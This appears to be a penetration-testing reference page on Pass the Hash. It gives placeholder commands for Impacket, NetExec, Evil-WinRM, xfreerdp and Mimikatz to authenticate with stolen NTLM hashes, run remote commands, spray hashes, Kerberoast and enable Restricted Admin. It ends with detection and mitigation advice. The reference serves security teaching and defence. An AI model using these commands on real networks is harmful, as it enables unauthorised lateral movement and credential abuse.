Pass the Hash

Overview

Pass the Hash (PtH) authenticates to remote services using an NTLM hash instead of a plaintext password. When NTLM authentication is used, the password is never sent — only its hash. This means a captured hash can be used directly for authentication without cracking it. PtH works with SMB, WinRM, RDP (restricted admin), LDAP, MSSQL, and other protocols that accept NTLM authentication.

ATT&CK Mapping

• Tactic: TA0008 - Lateral Movement
• Technique: T1550.002 - Use Alternate Authentication Material: Pass the Hash

Prerequisites

• Valid NTLM hash for a domain or local user
• Network access to the target service (SMB 445, WinRM 5985, etc.)
• Target must accept NTLM authentication (not Kerberos-only)

Techniques

SMB (PsExec / WMI / SMBExec)

# Impacket — PsExec with hash
# https://github.com/fortra/impacket
impacket-psexec '<domain>/<user>@<target>' -hashes ':<ntlm_hash>'

# Impacket — WMIExec with hash
impacket-wmiexec '<domain>/<user>@<target>' -hashes ':<ntlm_hash>'

# Impacket — SMBExec with hash
impacket-smbexec '<domain>/<user>@<target>' -hashes ':<ntlm_hash>'

# NetExec — SMB with hash
# https://github.com/Pennyw0rth/NetExec
nxc smb <target> -u <user> -H <ntlm_hash>

# Execute commands
nxc smb <target> -u <user> -H <ntlm_hash> -x "whoami"

# Spray hash across multiple targets
nxc smb <targets_file> -u <user> -H <ntlm_hash>

WinRM

# Evil-WinRM
# https://github.com/Hackplayers/evil-winrm
evil-winrm -i <target> -u <user> -H <ntlm_hash>

# NetExec — WinRM with hash
# https://github.com/Pennyw0rth/NetExec
nxc winrm <target> -u <user> -H <ntlm_hash>

RDP (Restricted Admin Mode)

RDP with pass-the-hash requires Restricted Admin mode enabled on the target:

# xfreerdp
# https://github.com/FreeRDP/FreeRDP
xfreerdp /v:<target> /u:<user> /pth:<ntlm_hash> /d:<domain>

Enable Restricted Admin on the target (requires admin access):

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f

LDAP

# NetExec — LDAP with hash
# https://github.com/Pennyw0rth/NetExec
nxc ldap <dc_ip> -u <user> -H <ntlm_hash> --users
nxc ldap <dc_ip> -u <user> -H <ntlm_hash> --kerberoasting output.txt

MSSQL

# NetExec — MSSQL with hash
# https://github.com/Pennyw0rth/NetExec
nxc mssql <target> -u <user> -H <ntlm_hash> -q "SELECT system_user"

# Impacket
# https://github.com/fortra/impacket
impacket-mssqlclient '<domain>/<user>@<target>' -hashes ':<ntlm_hash>' -windows-auth

Mimikatz Pass-the-Hash

From Windows with Mimikatz:

# Mimikatz
# https://github.com/gentilkiwi/mimikatz
mimikatz# sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm_hash>

This spawns a new process authenticated with the provided hash.

Detection Methods

Network-Based Detection

• NTLM authentication from unusual source hosts
• NTLM authentication for accounts that normally use Kerberos

Host-Based Detection

• Windows Security Event 4624 (Logon) with logon type 3 (network) and NTLM authentication package
• Unusual process creation following network logon events

Mitigation Strategies

• Disable NTLM — enforce Kerberos authentication where possible
• Credential Guard — prevents LSASS from storing NTLM hashes in memory
• Restrict local admin — limit which accounts have local admin across multiple systems
• Network segmentation — restrict lateral movement paths between systems
• Protected Users group — members cannot authenticate via NTLM

References

Official Documentation

• Impacket
• Evil-WinRM
• Mimikatz

MITRE ATT&CK

• T1550.002 - Use Alternate Authentication Material: Pass the Hash